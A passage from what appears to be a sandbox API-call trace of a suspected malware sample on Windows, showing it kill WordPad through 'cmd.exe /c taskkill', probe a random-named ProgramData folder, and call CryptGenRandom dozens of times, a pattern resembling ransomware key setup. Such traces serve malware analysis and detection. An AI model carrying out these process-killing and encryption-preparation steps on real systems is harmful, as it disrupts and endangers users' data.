dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0228.638] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x12497868 | out: lpFileInformation=0x12497868*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0228.638] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0228.638] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x124978b8 | out: lpFileInformation=0x124978b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0228.638] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0228.638] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x12497908 | out: lpFileInformation=0x12497908*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0228.638] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0228.639] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x12497958 | out: lpFileInformation=0x12497958*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0228.639] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0228.639] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x124979a8 | out: lpFileInformation=0x124979a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0228.639] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0228.639] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x124979f8 | out: lpFileInformation=0x124979f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0228.639] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0228.639] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x12497a48 | out: lpFileInformation=0x12497a48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0228.639] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0228.639] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x12497a98 | out: lpFileInformation=0x12497a98*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0228.639] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0228.639] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x12497ae8 | out: lpFileInformation=0x12497ae8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0228.639] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0228.640] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x12497b38 | out: lpFileInformation=0x12497b38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0228.640] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0228.640] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x12497b88 | out: lpFileInformation=0x12497b88*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0228.645] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0228.645] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x1247d380, nSize=0x64 | out: lpBuffer="") returned 0x63 [0228.645] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12497bd8 | out: lpFileInformation=0x12497bd8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0228.645] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1247d450, nSize=0x64 | out: lpBuffer="") returned 0x35 [0228.645] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12497c28 | out: lpFileInformation=0x12497c28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0228.645] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x13c [0228.646] GetConsoleMode (in: hConsoleHandle=0x13c, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0228.646] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0228.646] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0228.646] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0228.646] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0228.646] GetEnvironmentStringsW () returned 0x8ea900* [0228.646] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0228.646] GetCurrentProcess () returned 0xffffffff [0228.646] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x13c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124a97e0, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124a97e0*=0x140) returned 1 [0228.646] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124a97e4, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124a97e4*=0x144) returned 1 [0228.646] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124a97e8, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124a97e8*=0x154) returned 1 [0228.647] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"taskkill /f /im wordpad.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x124ed500, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x140, hStdOutput=0x144, hStdError=0x154), lpProcessInformation=0x123a3a80 | out: lpCommandLine="cmd.exe /c \"taskkill /f /im wordpad.exe\"", lpProcessInformation=0x123a3a80*(hProcess=0x130, hThread=0x158, dwProcessId=0x101c, dwThreadId=0x1020)) returned 1 [0228.681] CloseHandle (hObject=0x158) returned 1 [0228.682] CloseHandle (hObject=0x154) returned 1 [0228.682] CloseHandle (hObject=0x144) returned 1 [0228.682] CloseHandle (hObject=0x140) returned 1 [0228.682] CloseHandle (hObject=0x13c) returned 1 [0228.682] CloseHandle (hObject=0x138) returned 1 [0228.682] CloseHandle (hObject=0x134) returned 1 [0228.682] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0xffffffff) returned 0x0 [0230.084] SetEvent (hEvent=0x150) returned 1 [0230.084] GetExitCodeProcess (in: hProcess=0x130, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x80) returned 1 [0230.084] GetProcessTimes (in: hProcess=0x130, lpCreationTime=0x124f8700, lpExitTime=0x124f8708, lpKernelTime=0x124f8710, lpUserTime=0x124f8718 | out: lpCreationTime=0x124f8700, lpExitTime=0x124f8708, lpKernelTime=0x124f8710, lpUserTime=0x124f8718) returned 1 [0230.085] CloseHandle (hObject=0x130) returned 1 [0230.085] SetEvent (hEvent=0x128) returned 1 [0230.085] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x5) returned 0x102 [0230.102] SetEvent (hEvent=0x150) returned 1 [0230.102] SetEvent (hEvent=0x128) returned 1 [0230.102] GetEnvironmentVariableW (in: lpName="ALLUSERSPROFILE", lpBuffer=0x1248b450, nSize=0x64 | out: lpBuffer="") returned 0xe [0230.103] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\utbfPsCYzd" (normalized: "c:\\programdata\\utbfpscyzd"), fInfoLevelId=0x0, lpFileInformation=0x124a3c28 | out: lpFileInformation=0x124a3c28*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0230.103] CreateFileW (lpFileName="C:\\ProgramData\\utbfPsCYzd" (normalized: "c:\\programdata\\utbfpscyzd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0230.104] LoadLibraryExW (lpLibFileName="advapi32.dll", hFile=0x0, dwFlags=0x800) returned 0x74650000 [0230.104] GetProcAddress (hModule=0x74650000, lpProcName="CryptAcquireContextW") returned 0x74670590 [0230.105] CryptAcquireContextW (in: phProv=0x12392070, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12392070*=0x8e3e08) returned 1 [0231.317] SetEvent (hEvent=0x150) returned 1 [0231.317] GetProcAddress (hModule=0x74650000, lpProcName="CryptGenRandom") returned 0x746710a0 [0231.317] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.319] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.320] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.321] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.328] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.329] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.330] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.331] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.331] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.333] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.334] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.335] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.336] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.337] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.337] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.338] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.339] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.340] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.341] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.341] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.342] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.343] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.344] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.345] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.346] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.346] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.347] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.348] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.349] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.350] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.351] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.351] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.352] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.353] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.354] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.354] VirtualAlloc (lpAddress=0x12540000, dwSize=0x100000, flAllocationType=0x1000, flProtect=0x4) returned 0x12540000 [0231.359] VirtualAlloc (lpAddress=0x110dc000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x110dc000 [0231.362] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.367] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.368] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.369] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.370] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.371] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.371] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.372] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.373] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.374] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.375] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.376] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.377] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.377] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.379] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.381] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.382] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.383] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.383] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.384] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.385] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.386] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.387] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x124cec80 | out: pbBuffer=0x124cec80) returned 1 [0231.418] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.419] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.420] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.421] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.422] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.423] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.423] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.424] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.425] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.426] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.427] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.428] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.429] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.430] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.431] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.432] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.432] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.433] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.437] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.437] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: pbBuffer=0x12576080) returned 1 [0231.438] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12576080 | out: 